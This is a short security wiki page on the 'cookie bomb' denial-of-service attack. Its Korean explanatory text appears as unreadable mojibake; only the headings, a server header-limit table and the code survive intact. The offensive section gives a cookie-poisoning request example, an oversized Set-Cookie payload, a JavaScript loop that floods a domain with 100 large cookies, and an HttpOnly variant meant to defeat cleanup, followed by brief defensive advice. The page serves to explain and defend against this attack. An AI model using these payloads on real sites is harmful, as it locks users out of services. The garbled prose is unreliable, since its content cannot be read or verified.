Back

Cookie Bomb Attack

๐Ÿ” Introduction

Cookie bomb์€ ๋น„์ •์ƒ์ ์œผ๋กœ ํฐ ์ฟ ํ‚ค ๊ฐ’์„ ์ด์šฉํ•ด์„œ DOS๋ฅผ ์œ ๋„ํ•˜๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ ๊ฐ€์šฉ์„ฑ์„ ์นจํ•ดํ•˜๋Š” DOS ๊ณต๊ฒฉ์ด ์ฃผ๋ฅผ ์ด๋ฃจ๋ฉฐ, ์ด์™ธ์—๋„ ๋‹ค๋ฅธ ์ทจ์•ฝ์ ๊ณผ Chain attack ํ˜•ํƒœ๋กœ ์‚ฌ์šฉ๋  ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค.

์ผ๋ฐ˜์ ์œผ๋กœ HTTP Request์˜ ํ—ค๋”๊ฐ’์ด ํฐ ๊ฒฝ์šฐ ์„œ๋น„์Šค์—์„œ 413 Request Entity Too Large ๋˜๋Š” 400 Bad Request ๋“ฑ์˜ ์—๋Ÿฌ๋ฅผ ๋ฐ˜ํ™˜ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•  ์ˆ˜ ์žˆ๋Š” ํ—ค๋”์—๋Š” ๋Œ€ํ‘œ์ ์œผ๋กœ Cookie ํ—ค๋”๊ฐ€ ์žˆ์œผ๋ฉฐ, File cookie์— ๋Œ€๋Ÿ‰์˜ ๋ฐ์ดํ„ฐ๊ฐ€ ์‚ฝ์ž…๋œ ๊ฒฝ์šฐ ํ•ด๋‹น ์ฟ ํ‚ค๋ฅผ ์ดˆ๊ธฐํ™” ํ•˜์ง€ ์•Š๋Š” ์ด์ƒ ๋ชจ๋“  ์š”์ฒญ์—์„œ 413, 400 ์—๋Ÿฌ๋“ฑ์ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

์„œ๋น„์Šค์—์„œ ์ฟ ํ‚ค๋ฅผ ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋Š” ํฌ์ธํŠธ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๊ฐ€์žฅ ๊ฐ„๋‹จํ•˜๊ฒŒ๋Š” XSS ๊ทธ๋ฆฌ๊ณ  Cookie poisoning์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ ‡๊ฒŒ ์ž„์˜ ์ฟ ํ‚ค๋ฅผ ์‚ฌ์šฉ์ž์—๊ฒŒ ์„ธํŒ…ํ•  ์ˆ˜ ์žˆ๋Š” ๋ถ€๋ถ„์ด ์žˆ๋‹ค๋ฉด Cookie bomb attack์„ ์„ฑ๊ณตํ•  ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

e.g (cookie poisoning)

GET /info?locale=KR999 HTTP/1.1
HTTP/1.1 200 OK
Set-Cookie: localeCookie=KR999;

Exploitation

์›น ์„œ๋ฒ„๋“ค์€ ์•„๋ž˜์™€ ๊ฐ™์€ ์‚ฌ์ด์ฆˆ์˜ ํ—ค๋” ์š”์ฒญ์ด ์žˆ๋Š” ๊ฒฝ์šฐ ์—๋Ÿฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

Server Size
Nginx 4KB - 8KB
Apache 8KB
Tomcat 8KB - 48KB
IIS 8KB - 16KB

ํ•ด๋‹น ๋ฐ์ดํ„ฐ ๋ณด๋‹ค ํฐ ์ฟ ํ‚ค๊ฐ’์„ ์„ธํŒ…ํ•˜๋ฉด ํ•ด๋‹น ํŒŒ์ผ ์ฟ ํ‚ค๋ฅผ ์‚ญ์ œํ•˜์ง€ ์•Š๋Š” ์ด์ƒ ๋งค๋ฒˆ ์ ‘๊ทผ ์‹œ ์—๋Ÿฌ ๋ฉ”์‹œ์ง€๊ฐ€ ๋ฐœ์ƒํ•˜์—ฌ ์ •์ƒ์ ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•  ์ˆ˜ ์—†๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

Set-Cookie

HTTP/1.1 200 OK
Set-Cookie: localeCookie=aaaaaaaaa------big-size---------bbvbbbb;

With Javascript

var base_domain = "example.com";
var pollution = Array(4000).join('a');
for(var i=0;i<100;i++){
  document.cookie='bomb'+i+'='+pollution+';domain='+base_domain;
}

Bypass protection

ํ•ด๋‹น ๊ณต๊ฒฉ์˜ ๋Œ€์‘๋ฐฉ์•ˆ์ธ ์ฟ ํ‚ค์ •๋ณด ์ดˆ๊ธฐํ™”๋ฅผ Javascript ๋‹จ์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์•„๋ž˜์™€ ๊ฐ™์ด JS์—์„œ ์ปจํŠธ๋กค ํ•  ์ˆ˜ ์—†๋„๋ก HttpOnly ์†์„ฑ์„ ์ฃผ์–ด ๋ณดํ˜ธ ๋กœ์ง์„ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

HTTP/1.1 200 OK
Set-Cookie: localeCookie=aaaaaaaaa------big-size---------bbvbbbb; HttpOnly;

๐Ÿ›ก Defensive techniques

๋น„ ์ •์ƒ์ ์ธ ์ฟ ํ‚ค ์š”์ฒญ์ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋ฌด์กฐ๊ฑด ์—๋Ÿฌ๋กœ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์•„๋‹Œ ์ปค์Šคํ…€ ์—๋Ÿฌ ํŽ˜์ด์ง€์—์„œ Set-Cookie๋กœ ํ•ด๋‹น ์ฟ ํ‚ค์˜ expire ๋“ฑ์„ ์กฐ์ •ํ•˜์—ฌ ์ฟ ํ‚ค๋ฅผ ์ดˆ๊ธฐํ™”ํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€์žฅ ์ข‹์Šต๋‹ˆ๋‹ค.

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0